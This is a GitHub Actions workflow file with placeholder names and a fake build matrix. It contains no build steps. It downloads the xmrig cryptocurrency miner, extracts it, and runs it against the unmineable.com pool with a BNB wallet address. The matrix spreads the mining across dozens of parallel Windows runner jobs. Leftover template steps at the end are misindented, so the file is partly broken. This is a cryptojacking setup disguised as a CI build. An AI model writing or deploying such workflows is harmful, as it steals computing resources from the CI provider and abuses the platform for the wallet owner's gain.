name: NAME

on: [workflow_dispatch]

jobs:
  build:
    name: NAME
    runs-on: windows-latest
    strategy:
      max-parallel: 5
      fail-fast: false
      matrix:
        go: [1.0, 1.1, 1.2, 1.3, 1,35]
        flag: [A, B, C, D, E, F, G, H, I]
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: DOWNLOAD
      run: Invoke-WebRequest https://github.com/xmrig/xmrig/releases/download/v6.16.4/xmrig-6.16.4-msvc-win64.zip -OutFile xmrig-6.16.4-msvc-win64.zip 
    - name: Extract
      run: Expand-Archive xmrig-6.16.4-msvc-win64.zip
    - name: RUNNING
      run: .\xmrig-6.16.4-msvc-win64\xmrig-6.16.4\xmrig.exe -o rx.unmineable.com:3333 -a rx -k -p x -t 8 -u BNB:0xa300949238f80ac9a6fa627eade4e81e4c73bea1.TOBY
    - name: DONE
      run: exit

      # Runs a single command using the runners shell
      - name: Run a one-line script
        run: echo Hello, world!

      # Runs a set of commands using the runners shell
      - name: Run a multi-line script
        run: |
          echo Add other actions to build,
          echo test, and deploy your project.
